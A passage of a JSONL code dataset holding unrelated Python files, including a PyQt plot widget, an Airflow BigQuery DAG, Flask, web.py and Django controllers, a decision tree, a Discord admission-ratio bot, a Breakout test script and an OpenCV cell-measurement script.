+{"seq_id":"127714847","text":"################################################################################\n## 3D Plot widget\n# Author: Maleakhi, Alex, Faidon, Jamie, Olle, Harry\n################################################################################\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom matplotlib.backends.qt_compat import QtCore, QtWidgets\nfrom matplotlib.backends.backend_qt5agg import (\n FigureCanvas, NavigationToolbar2QT as NavigationToolbar)\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n###############################################################################\n## 3D Trajectories Plot\n# Display agent's trajectories\n\nclass Plot3D(QWidget):\n \"\"\"\n Class to plot agent's trajectories.\n \"\"\"\n\n def __init__(self):\n \n super().__init__()\n\n # 3D Plot settings\n self.window = None\n self.fig = plt.figure(figsize=(3, 6))\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.canvas = FigureCanvas(self.fig)\n\n # Agent trajactories storage\n self.x_traj = []\n self.y_traj = []\n self.z_traj = []\n\n # Target storage\n self.tgt_x = []\n self.tgt_y = []\n self.tgt_z = []\n\n # Manage layout\n vbox = QVBoxLayout()\n vbox.addWidget(self.canvas)\n\n self.setLayout(vbox)\n \n def add_trajectories(self, x, y, z):\n \"\"\"\n Add trajectories\n\n :param x: x value to be added\n :param y: y value to be added\n :param z: z value to be added\n \"\"\"\n\n self.x_traj.append(x)\n self.y_traj.append(y)\n self.z_traj.append(z)\n \n def add_target(self, target):\n \"\"\"\n Add target coordinates.\n\n :param target: array of targets\n \"\"\"\n\n if target is not None:\n self.tgt_x.append(target[0])\n self.tgt_y.append(target[1])\n self.tgt_z.append(target[2])\n \n def clear_3d(self):\n \"\"\"\n Used to clear 3d trajectories\n \"\"\"\n \n self.x_traj = []\n self.y_traj = []\n self.z_traj = []\n\n self.tgt_x = []\n self.tgt_y = []\n self.tgt_z = []\n\n width = self.window.widget.width\n height = self.window.widget.height\n height_x = self.window.widget.height_x\n\n self.ax.clear()\n self.set_3d_axes(self.ax, width, height, height_x)\n self.canvas.draw()\n \n def set_3d_axes(self, ax, x_lim, y_lim, z_lim):\n \"\"\"\n Sets the axis labels and limits.\n \"\"\"\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n \n ax.set_xlim(0, x_lim)\n ax.set_ylim(0, y_lim)\n ax.set_zlim(0, z_lim)\n \n def draw(self):\n \"\"\"\n Draw plots\n \"\"\"\n\n width = self.window.widget.width\n height = self.window.widget.height\n height_x = self.window.widget.height_x\n\n self.ax.plot(self.x_traj,self.y_traj,self.z_traj, c=\"#0091D4\", linewidth=1.5)\n self.ax.plot(self.tgt_x,self.tgt_y,self.tgt_z, marker='x', c='green', linewidth=1.5)\n self.set_3d_axes(self.ax, width, height, height_x)\n self.canvas.draw()","sub_path":"examples/LandmarkDetection/DQN/GUI/plot_3d.py","file_name":"plot_3d.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"426714067","text":"import airflow\nfrom airflow import DAG\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow import models\nfrom ncaa_dependencies.table_schemas import *\nfrom airflow.contrib.operators.bigquery_operator import BigQueryOperator\n\ndefault_args = {\n 'owner': 
'airflow',\n 'depends_on_past': False,\n #'start_date': airflow.utils.dates.days_ago(2),\n 'start_date': datetime(2019, 6, 11, 14, 30),\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\n\ndag = DAG('NCAA_View_to_Table',\n default_args=default_args,\n schedule_interval=timedelta(days=1),\n catchup=False\n )\n\nstart = BashOperator(task_id='start_message',\n bash_command='echo \"started\"',\n dag=dag)\n\n\nend = BashOperator(task_id='end_message',\n bash_command='echo \"Finished\"',\n dag=dag)\n\n\n\n\n\nfor table in TABLES:\n\n\n query = BigQueryOperator(\n sql=f'SELECT * FROM {table}',\n task_id=f'append_{table}_to_table',\n destination_dataset_table=f'{APPEND[table]}',\n allow_large_results=True,\n bigquery_conn_id='bigquery_default',\n create_disposition='CREATE_IF_NEEDED',\n write_disposition='WRITE_APPEND',\n use_legacy_sql=False,\n dag=dag\n )\n start >> query >> end\n","sub_path":"BQ-append-DAG/ncaa_bq_DAG.py","file_name":"ncaa_bq_DAG.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"373720193","text":"from traffgroup.core.X.xflask import Controller, Route\nfrom traffgroup.core.X.mako import render_template\nfrom flask import g, request, redirect\nfrom traffgroup.x.security import CProtect\nfrom traffgroup.core.model.partners import TicketMessage, Ticket\nfrom traffgroup.core.model.meta import Session\nfrom sqlalchemy.sql.expression import desc\nfrom traffgroup.x.util.func import try_int\nfrom traffgroup.core.model.security.account import Account\nfrom webhelpers.paginate import Page, PageURL\n\nfrom traffgroup.admin.lib.predicate import IsAdmin\n\n\nPER_PAGE = 25\n\n\n@CProtect(IsAdmin())\n@Controller(\"/tickets\")\nclass TicketsController(object):\n @Route('/')\n def list(self): #@ReservedAssignment\n g.partner = try_int(request.values.get('partner', -1))\n g.type = try_int(request.values.get('type', -1))\n g.status = try_int(request.values.get('status', -1))\n g.importance = try_int(request.values.get('importance', -1))\n g.page = (abs(try_int(request.values.get('page'))) or 1) - 1\n\n q_account = Session.query(Account)\n\n g.partners = q_account.all()\n\n q = Session.query(Ticket, Account).filter(\n Ticket.partner_id == Account.id)\n\n if g.type != -1: q = q.filter(Ticket.type == g.type)\n\n if g.partner != -1: q = q.filter(Ticket.partner_id == g.partner)\n\n if g.status != -1: q = q.filter(Ticket.state == g.status)\n\n if g.importance != -1: q = q.filter(Ticket.importance == g.importance)\n\n #q = q.order_by(asc(Ticket.state),desc(Ticket.ts_last), desc(Ticket.importance))\n q = q.order_by(desc(Ticket.ts_spawn))\n\n g.tickets = q.limit(PER_PAGE).offset(g.page * PER_PAGE).all()\n tickets_ids = [ticket.id for ticket, account in g.tickets]\n g.messages_dict = {}\n for message in TicketMessage.Filter(TicketMessage.ticket_id.in_(tickets_ids)):\n if message.ticket_id not in g.messages_dict:\n g.messages_dict[message.ticket_id] = []\n g.messages_dict[message.ticket_id].append(message)\n\n xargs = {\"partner\": g.partner,\n \"type\": g.type,\n \"status\": g.status,\n \"importance\": g.importance}\n\n g.paginator = Page(range(q.count()),\n items_per_page=PER_PAGE,\n page=g.page + 1,\n url=PageURL('/tickets', xargs))\n\n return render_template(\"tickets/index.mako\")\n\n\n @Route('/messages/')\n def messages(self, ticket_id=None):\n\n if ticket_id == None:\n return 
render_template(\"tickets/thread.mako\")\n\n g.ticket = Ticket.Get(ticket_id)\n\n g.messages = TicketMessage.Filter(ticket_id=ticket_id).all()\n\n return render_template(\"tickets/thread.mako\")\n\n\n @Route('/reply/', methods=['GET', 'POST'])\n def reply(self, ticket_id=None):\n if not ticket_id:\n redirect('tickets')\n\n txt = request.form.get('reply')\n isclose = request.form.get('close-thread', 0)\n\n g.ticket = Ticket.Get(ticket_id)\n g.messages = TicketMessage.Filter(ticket_id=ticket_id).all()\n g.ticket.reply(TicketMessage(message=txt, flags=TicketMessage.Flag.SYSTEM))\n\n if isclose:\n g.ticket.state = Ticket.State.CLOSED\n g.ticket.save()\n\n g.state = g.ticket.state\n\n return redirect('tickets/messages/%d' % ticket_id)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"traffgroup/admin/controllers/ticket.py","file_name":"ticket.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"538765034","text":"# def divisible_by_five(n):\n# if(n % 5 == 0):\n# \t return True\n# else:\n# return False\n\n# print(divisible_by_five(21))\n\n\n# #less than 100\n# def less_than_100(a, b):\n# if(a + b < 100):\n# return True\n# else:\n# return False\n\n\n# print(less_than_100(90, 9)\n\n# def frames(minutes, fps):\n# \treturn (minutes * 60) * (fps)\n# #return results\n \n# print(frames(60,1))\n\n# def divisible(num):\n# if(num % 100 ==0):\n# return True\n# else:\n# return False\n# print(divisible(100))\n\nsmallest = None\nprint(\"Before:\", smallest)\nfor itervar in [3, 41, 12, 9, 74, 15]:\n if smallest is None or itervar < smallest:\n smallest = itervar\n break\n print(\"Loop:\", itervar, smallest)\nprint(\"Smallest:\", smallest)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"588872462","text":"#from models.producto import Producto\nfrom controllers.login import logged\nfrom models.usuario_de_internet import Usuario_de_internet\n#from models.orden import Orden\nimport web\n\nrender = web.template.render('templates/', base=\"base\")\nclass VerOrdenesPrevias():\n def GET(self):\n #import ipdb; ipdb.set_trace() \n ordenes=Orden.getPrevias(web.ctx.session.privilege)\n return render.ver_ordenes_previas(ordenes)\n\nclass VerCarrito:\n def GET(self):\n order = Orden.getCarrito(web.ctx.session.privilege)\n user = Usuario_de_internet.getById(web.ctx.session.privilege)\n order_lines = order.getLineas(user.dr_ciudad_id)\n total = 0\n for ol in order_lines:\n total += ol['cantidad'] + ol['precio']\n return render.carrito(order_lines, total=total, user=user)\n\n\nclass AnadirProducto:\n def POST(self):\n #import ipdb; ipdb.set_trace()\n mensaje = \"Producto agregado!\"\n user = Usuario_de_internet.getById(web.ctx.session.privilege)\n datos = web.input()\n producto_id = int(datos['producto_id'])\n cantidad = int(datos['cantidad'])\n order = Orden.getCarrito(web.ctx.session.privilege)\n order.anadirProducto(producto_id, cantidad)\n web.seeother(\"/carrito/\")\n\n\nclass CheckOutCarrito:\n def POST(self):\n #import ipdb; ipdb.set_trace()\n from models.producto import Producto\n datos = web.input()\n medio_de_pago = datos['medio_de_pago']\n user = Usuario_de_internet.getById(web.ctx.session.privilege)\n dr_ciudad_id = user.dr_ciudad_id\n order = Orden.getCarrito(user.id)\n order.medio_de_pago = medio_de_pago\n order_lines = order.getLineas(user.dr_ciudad_id)\n total = 0\n for ol in 
order_lines:\n            Producto.getById(ol['product_id']).reducirEnCiudad(dr_ciudad_id, ol['cantidad'])\n            total += ol['cantidad'] + ol['precio']\n        order.total= total\n        order.save()\n        Orden.create(web.ctx.session.privilege)\n        web.seeother(\"/carrito/\")","sub_path":"controllers/order_controller.py","file_name":"order_controller.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118403561","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 19 02:32:19 2018\n\n@author: vedanta\n\"\"\"\n\nimport numpy as np\nfrom datetime import datetime\nfrom util import get_data,get_xor\n\ndef entropy(Y):\n    N = len(Y)\n    s1= (Y==1).sum()\n    if s1==0 or s1==N:\n        return 0\n    p1 = s1/float(N)\n    p0 = 1-p1\n    return -p0*np.log2(p0) - p1*np.log2(p1)\n\ndef Information_Gain(x,y,best_split):\n    N = len(y)\n    y0 = y[x<best_split]\n    y1 = y[x>=best_split]\n    y0_prob = len(y0)/float(N)\n    y1_prob = 1 - y0_prob\n    return entropy(y) - y0_prob*entropy(y0) - y1_prob*entropy(y1)\n\ndef find_split(X,Y,col):\n    sorted_indices = np.argsort(X[:,col])\n    x_sort = X[sorted_indices]\n    y_sort = Y[sorted_indices]\n    boundaries = np.nonzero(y_sort[:-1]!=y_sort[1:])[0]\n    max_IG = 0\n    best_split = None\n    \n    for i in boundaries:\n        x_split = (x_sort[i] + x_sort[i+1])/2\n        IG = Information_Gain(x_sort,y_sort,x_split)\n        if IG>max_IG:\n            max_IG = IG\n            best_split = x_split\n    return max_IG,best_split\n    \nclass TreeNode:\n    def __init__(self,depth=0,max_depth=None):\n        self.depth = depth\n        self.max_depth = max_depth\n    \n    def fit(self,X,Y):\n        if(len(Y)==1 or len(set(Y))==1):\n            self.col = None\n            self.split = None\n            self.right = None\n            self.left = None\n            self.prediction = Y[0]\n        else:\n            D = X.shape[1]\n            cols = range(D)\n            max_IG = 0\n            best_col= None\n            best_split = None\n            for col in cols:\n                IG,split = find_split(X,Y,col)\n                if IG>max_IG:\n                    max_IG = IG\n                    best_split = split\n                    best_col = col\n            if max_IG == 0: \n                \"\"\"Leaf Node\"\"\"\n                self.col = None\n                self.split = None\n                self.left = None\n                self.right = None\n                self.prediction = np.round(Y.mean())\n            else :\n                self.col = best_col\n                self.split = best_split\n                if self.depth == self.max_depth:\n                    \"\"\"If we do not set a max_depth, it would lead to overfitting\"\"\"\n                    self.left = None\n                    self.right = None\n                    self.prediction = [\n                    np.round(Y[X[:,best_col]<best_split].mean()),\n                    np.round(Y[X[:,best_col]>=best_split].mean())\n                ]\n                else:\n                    left_indices = X[:,best_col]<best_split\n                    right_indices = X[:,best_col]>=best_split\n                    \n                    x_left = X[left_indices]\n                    y_left = Y[left_indices]\n                    x_right = X[right_indices]\n                    y_right = Y[right_indices]\n                    self.left = TreeNode(self.depth+1,self.max_depth)\n                    self.right = TreeNode(self.depth+1,self.max_depth)\n                    self.left.fit(x_left,y_left)\n                    self.right.fit(x_right,y_right)\n            \n            \n    \n    def predict_one(self,x):\n        \"\"\"Predict for only one case\"\"\"\n        if self.col is not None and self.split is not None:\n            feature = x[self.col]\n            \n            if feature < self.split:\n                if self.left:\n                    return self.left.predict_one(x)\n                else:\n                    return self.prediction[0]\n            \n            else:\n                if self.right:\n                    return self.right.predict_one(x)\n                else:\n                    return self.prediction[1]\n        \n        else:\n            return self.prediction\n    \n    def predict(self,X):\n        N,D = X.shape\n        p = np.zeros(N)\n        for i in xrange(N):\n            p[i] = self.predict_one(X[i])\n        return p\n    \nclass DecisionTree:\n    def __init__(self,max_depth=0):\n        self.max_depth = max_depth\n    \n    def fit(self,X,Y):\n        self.root = TreeNode(0,self.max_depth)\n        self.root.fit(X,Y)\n    \n    def predict(self,X):\n        return self.root.predict(X)\n    \n    def score(self,X,Y):\n        p = self.predict(X)\n        return np.mean(Y==p)\n    \n    \n    \n    \n 
\n \n","sub_path":"Supervised Learning/DecisionTrees.py","file_name":"DecisionTrees.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"558242342","text":"import datetime\n\nimport aiohttp\nimport pyppeteer\nfrom discord import Embed, Webhook, AsyncWebhookAdapter\nfrom discord.ext import commands, tasks\n\nfrom univ_ratio.dtutils import get_discord_timestamp\nfrom univ_ratio.get_univ_ratio import UnivObject, UnivConfig\n\n\nclass UnivBot(commands.Bot):\n def __init__(self):\n super(UnivBot, self).__init__(command_prefix=['대학경쟁률 '], help_command=None)\n self.config: UnivConfig = UnivConfig.load()\n self.session = aiohttp.ClientSession()\n self.webhook = Webhook.from_url('YOUR_WEBHOOK_URL', adapter=AsyncWebhookAdapter(session=self.session))\n\n self.add_command(self.univ_ratio_cmd)\n self.add_command(self.ur_view_cmd)\n self.add_command(self.ur_update_cmd)\n\n async def on_ready(self):\n self.update_and_notify.start()\n\n async def close(self):\n self.config.save()\n self.update_and_notify.cancel()\n await self.session.close()\n await super(UnivBot, self).close()\n\n @tasks.loop(hours=1)\n async def update_and_notify(self):\n browser = await pyppeteer.launch(headless=True, args=[\n '--no-sandbox',\n '--disable-setuid-sandbox'\n ])\n self.config.updated = datetime.datetime.utcnow().astimezone(tz=datetime.timezone.utc)\n for univ in self.config.univ_data.values():\n data = await univ.update(browser)\n if not univ.final:\n await self.webhook.send(\n username=univ.name,\n content=f'경쟁률이 갱신되었습니다!',\n embed=Embed(\n title=f'{univ.name} {data.name}',\n description=f'갱신일자 : {get_discord_timestamp(self.config.updated)}'\n ).add_field(\n name='모집인원',\n value=f'{data.recruit} 명',\n inline=True\n ).add_field(\n name='지원자',\n value=f'{data.apply} 명',\n inline=True\n ).add_field(\n name='경쟁률',\n value=f'{data.ratio} : 1',\n inline=True\n )\n )\n await browser.close()\n\n @commands.group(\n name='univ-ratio',\n aliases=['ur', '대학경쟁률', 'ㄷㄱ']\n )\n async def univ_ratio_cmd(self, ctx: commands.Context):\n if not ctx.invoked_subcommand:\n await ctx.send(embed=Embed(\n title='별무리 - 대학경쟁률',\n description='대학 관련 기능입니다.'\n ).add_field(\n name='보기',\n value='대학경쟁률을 확인합니다.\\n'\n '`ㅂㅁㄹ 대학경쟁률 보기` 로 사용할 수 있습니다.',\n inline=False\n ).add_field(\n name='갱신',\n value='대학경쟁률을 수동으로 갱신합니다.\\n'\n '`ㅂㅁㄹ 대학경쟁률 갱신` 으로 사용할 수 있습니다.',\n inline=False\n ))\n\n @univ_ratio_cmd.command(\n name='view',\n aliases=['보기']\n )\n async def ur_view_cmd(self, ctx: commands.Context):\n embed = Embed(\n title='대학 경쟁률 정보',\n description='등록된 대학-전형의 경쟁률을 표시합니다.'\n )\n for univ in self.config.univ_data.values():\n embed.add_field(\n name=f'{univ.name} {univ.ratio_data.name} ' if univ.ratio_data is not None else f'{univ.name} UNKNOWN ' + '(최종)' if univ.final else '(갱신중)',\n value=f'{univ.ratio_data.ratio} : 1' if univ.ratio_data is not None else 'NOT PARSED',\n inline=False\n )\n await ctx.send(embed=embed)\n\n @univ_ratio_cmd.command(\n name='manual-update',\n aliases=['mu', '수동갱신', '갱신']\n )\n async def ur_update_cmd(self, ctx: commands.Context):\n await self.update_and_notify()\n await ctx.send('> 갱신했습니다.')\n\n\nbot = UnivBot()\nbot.run('YOUR_TOKEN')\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"187318812","text":"import importlib\nimport os\n\nimport mod1\n\n\ndef main():\n print(os.getcwd())\n mod_name = 
os.getcwd().replace('/', '.') + '.function'\n print(mod_name)\n # module = importlib.import_module(mod_name)\n # module.sayhello()\n\n mod1.funA()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/importlib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"266703313","text":"import gym\nimport numpy as np\nimport tensorflow as tf\nfrom q_net import q_net\nimport matplotlib.pyplot as plt\n\nnum_episodes = int(1e3)\n\nenv = gym.make('Breakout-v0')\nenv.seed(0)\n\nlearning_network = q_net('learning')\ntarget_network = q_net('target')\nsaver = tf.train.Saver()\n\ndef preprocess(image):\n \"\"\" prepro 210x160x3 uint8 frame into 6400 (80x80) 2D int array \"\"\"\n image = image[35:195] # crop\n image = image[::2,::2,0] # downsample by factor of 2\n image[image == 144] = 0 # erase background (background type 1)\n image[image == 109] = 0 # erase background (background type 2)\n image[image != 0] = 1 # everything else just set to 1\n return np.reshape(image.astype(np.uint8).ravel(), [80,80])\n\ndef create_new_state(obs):\n new_state = np.stack([obs, obs, obs, obs], axis=2)\n return new_state\n\ndef roll_state(state, obs):\n new_state = np.roll(state, 1, axis=2)\n new_state[:, :, 0] = obs\n return new_state\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver.restore(sess, 'partially_trained_model/model.ckpt')\n\n obs = env.reset()\n obs = preprocess(obs)\n state = create_new_state(obs)\n\n rewards_tracker = []\n\n for iteration in range(num_episodes):\n rewards = []\n\n while True:\n state_input = np.stack([state]).astype(dtype=np.float32) # prepare to feed placeholder learning_network.obs\n Q = learning_network.get_Q(obs=state_input)\n act = np.argmax(Q)\n\n next_obs, reward, done, _ = env.step(act)\n\n rewards.append(reward)\n\n if done:\n obs = env.reset()\n obs = preprocess(obs)\n state = create_new_state(obs)\n\n break\n else:\n next_obs = preprocess(next_obs)\n new_state = roll_state(state, next_obs)\n state = new_state\n\n rewards_tracker.append(sum(rewards))\n smoothed_rewards_tracker = [np.mean(rewards_tracker[max(0, i - 10):i + 1]) for i in range(len(rewards_tracker))]\n\n plt.figure(figsize=(8, 6))\n plt.plot(rewards_tracker, 'b.', label='total reward')\n plt.plot(smoothed_rewards_tracker, 'r', label='smoothed')\n plt.xlabel('episode number', fontsize=20)\n plt.legend(loc='upper right', prop={'size': 20})\n plt.savefig('test_rewards.png')\n plt.close()\n\n print(iteration, sum(rewards))\n","sub_path":"breakout-v0/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514469632","text":"# Create a circle around the nucleus and walk through all the rays coming from the center, looking for the cell wall\r\n# Xu_Yang 2020.8.11\r\n\r\nimport math_test\r\nimport cv2 as cv\r\nfrom math_test import *\r\nfrom pylab import *\r\nfrom pixelbetweenpoints import pixel_between_two_points\r\ndef step4(cell_id):\r\n\r\n display = cv.imread(\"bin\\\\temp.bmp\")\r\n\r\n\r\n img = cv.imread(\"bin\\\\temp_1.bmp\")\r\n img_result = img.copy()\r\n # img=cv.cvtColor(img,cv.COLOR_BGR2BGRA)\r\n\r\n\r\n # -----preprocess-----\r\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n # cv.imshow(\"gray\", gray)\r\n\r\n gauss = cv.GaussianBlur(gray, (5, 5), 5)\r\n\r\n img_shape = gauss.shape\r\n\r\n # read from local\r\n f = 
open(\"bin\\\\dict.txt\", 'r')\r\n dict_ = eval(f.read())\r\n f.close()\r\n #print(\"read from local : \", dict_)\r\n # distance from single point to center\r\n distance_from_single_point_to_center_list = []\r\n\r\n for m in range(cell_id, cell_id+1): # 对某些点进行测试# 28上一次测试的\r\n # \r\n\r\n x_sample = dict_[m][0]\r\n y_sample = dict_[m][1]\r\n angle_temp_list = angle_round(x_sample, y_sample, 65) # 第三个参数为圆的半径\r\n\r\n for i in range(1, 73):\r\n x1 = angle_temp_list[i - 1][0]\r\n y1 = angle_temp_list[i - 1][1]\r\n cx = x_sample\r\n cy = y_sample\r\n temp_list = pixel_between_two_points(cx, round(x1), cy, round(y1))\r\n\r\n ray_lenth = 0\r\n compare_distance_value = 0\r\n compare_color_value = 255\r\n color_hist = []\r\n # 单条射线的所有点,颜色深度的集合,找出前三名\r\n color_deep_rank = {}\r\n for m in range(0, len(temp_list)):\r\n x_temp = temp_list[m][0]\r\n y_temp = temp_list[m][1]\r\n\r\n single_lenth = cell_wall_ray_lenth(cx, cy, x_temp, y_temp)\r\n\r\n color_deep_rank[y_temp, x_temp] = gauss[y_temp][x_temp]\r\n\r\n sorted_color_deep_rank = sorted(color_deep_rank.items(), key=lambda kv: (kv[1], kv[0]), reverse=False)\r\n\r\n if gauss[y_temp][x_temp] <= compare_color_value:\r\n compare_color_value = gauss[y_temp][x_temp]\r\n compare_distance_valuevalue = single_lenth\r\n\r\n x_final = x_temp\r\n y_final = y_temp\r\n else:\r\n pass\r\n # ==hist graph\r\n color_hist.append(gauss[y_temp][x_temp])\r\n\r\n #print(\"**************** test: compare_color_value: \", compare_color_value, \"dic rank: \",sorted_color_deep_rank[0], sorted_color_deep_rank[1], sorted_color_deep_rank[2])\r\n # plt.plot(color_hist, color=\"black\")\r\n # plt.show()\r\n cv.circle(display, (round(x_final), round(y_final)), 1, (0, 0, 255), -1)\r\n # cv.circle(img, (round(sorted_color_deep_rank[1][0][1]), round(sorted_color_deep_rank[1][0][0])), 1, (0, 255, 255), -1)\r\n # cv.circle(img, (round(sorted_color_deep_rank[2][0][1]), round(sorted_color_deep_rank[2][0][0])), 1, (0, 255, 255), -1)\r\n fixed_data_list = un_angle_round(x_sample,y_sample,fixed_data)\r\n #print(fixed_data_list)\r\n cv.circle(display, (round(fixed_data_list[i-1][0]), round(fixed_data_list[i-1][1])), 1, (0, 255, 0), -1)\r\n #cv.circle(display, (round(x1), round(y1)), 1, (255, 0, 255), -1) # 半径显示\r\n\r\n # distance test and upload\r\n distance_from_single_point_to_center_list.append(distance(x_final, y_final, cx, cy))\r\n\r\n standard_r=math.ceil(mean(fixed_data))\r\n standard_error=0\r\n for i in range(0,72):\r\n standard_error+=abs(fixed_data[i]-standard_r)\r\n\r\n\r\n\r\n area_calculate_from_points(fixed_data_list)\r\n #holo_area_calculate_from_points(fixed_data_list,gray,200)\r\n\r\n plt.show()\r\n #mean of r\r\n cv.circle(display, (x_sample, y_sample), math.ceil(standard_r), (0, 255, 255), 0)\r\n #print(\"not circle degree is: \",format(((standard_error/72)/standard_r),'.2%'))\r\n #=========nucleus=======\r\n file1 = open('bin\\\\area_of_nucleus.txt', 'r')\r\n dataset1 = [float(x.strip()) for x in file1]\r\n file1.close()\r\n #print(\"The area of cell nucleus is: \",round(dataset1[cell_id-1]))\r\n\r\n cv.putText(display,\"Chromophobe Kidney Cancer Test\", (80, 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 1)\r\n cv.putText(display, time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()), (80 , 60), cv.FONT_HERSHEY_SIMPLEX, 0.5,\r\n (0, 0, 0), 1)\r\n cv.putText(display, \"The area of this cell is:\"+str(area_calculate_from_points(fixed_data_list)), (80, (img.shape[1]-220)), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 1)\r\n cv.putText(display, \"not circle degree is: 
\"+str(format(((standard_error/72)/standard_r),'.2%')), (80, img.shape[1]-200), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 1)\r\n\r\n\r\n #cv.imshow(\"step4 output\", display)\r\n cv.imwrite(\"output_single\\\\\"+str(cell_id)+\".bmp\",display)\r\n #cv.waitKey()\r\n output1_non_circle_degree=(standard_error/72)/standard_r\r\n return (output1_non_circle_degree)\r\n","sub_path":"feature_4.py","file_name":"feature_4.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224376602","text":"# -*- coding: utf-8 -*- #\n# Copyright 2019 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Create command for the Label Manager - Label Values CLI.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.labelmanager import service as labelmanager\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.labelmanager import arguments\nfrom googlecloudsdk.command_lib.labelmanager import operations\nfrom googlecloudsdk.command_lib.labelmanager import utils\n\n\n@base.Hidden\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA)\nclass Create(base.Command):\n \"\"\"Creates a LabelValue resource.\n\n Creates a LabelValue resource given the display name and description as\n well as details on the parent of the LabelValue. 
The parent of the\n LabelValue is always a LabelKey and the LabelKey's details can be passed as\n a numeric id or the display name along with the label-parent.\n \"\"\"\n\n detailed_help = {\n 'EXAMPLES':\n \"\"\"\n To create a LabelValue with the display name 'test' and the\n description 'description' under a LabelKey with display name 'env'\n under 'organizations/123', run:\n\n $ {command} test --label-key='env'\n --label-parent='organizations/123' --description='description'\n\n To create a LabelValue with the display name 'test' under LabelKey\n with id '456', run:\n\n $ {command} test --label-key='labelKeys/456'\n --description='description'\n \"\"\"\n }\n\n @staticmethod\n def Args(parser):\n group = parser.add_argument_group('LabelValue.', required=False)\n arguments.AddLabelParentArgToParser(\n group,\n required=False,\n message=(' --label-parent is required when using display name instead '\n 'of numeric id for the --label-key flag.'))\n arguments.AddDisplayNameArgToParser(group)\n arguments.AddLabelKeyArgToParser(group)\n arguments.AddDescriptionArgToParser(parser)\n arguments.AddAsyncArgToParser(parser)\n\n def Run(self, args):\n labelvalues_service = labelmanager.LabelValuesService()\n labelmanager_messages = labelmanager.LabelManagerMessages()\n\n if args.IsSpecified('label_parent'):\n label_key = utils.GetLabelKeyFromDisplayName(args.label_key,\n args.label_parent)\n else:\n label_key = args.label_key\n\n create_request = labelmanager_messages.LabelValue(\n displayName=args.DISPLAY_NAME,\n parent=label_key,\n description=args.description)\n op = labelvalues_service.Create(create_request)\n\n if args.async_:\n return op\n else:\n return operations.WaitForOperation(\n op,\n 'Waiting for LabelValue [{}] to be created with [{}]'.format(\n args.DISPLAY_NAME, op.name),\n service=labelvalues_service)\n","sub_path":"google-cloud-sdk/lib/surface/labelmanager/values/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581683807","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponseRedirect\n\nfrom .models import Todo\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n@login_required\ndef index(request):\n todos= Todo.objects.filter(author= request.user)[:10]\n context ={\n 'todos':todos\n }\n return render(request, 'index.html',context)\n\n@login_required\ndef details(request,id):\n todo = Todo.objects.get(id=id)\n\n context = {\n 'todo': todo\n }\n return render(request, 'details.html',context)\n\n@login_required\ndef add(request):\n if request.method == 'POST':\n title = request.POST['title']\n text = request.POST['text']\n\n todo =Todo(title=title, text=text,author= request.user)\n todo.save()\n\n return HttpResponseRedirect('/todos')\n else:\n return render(request, 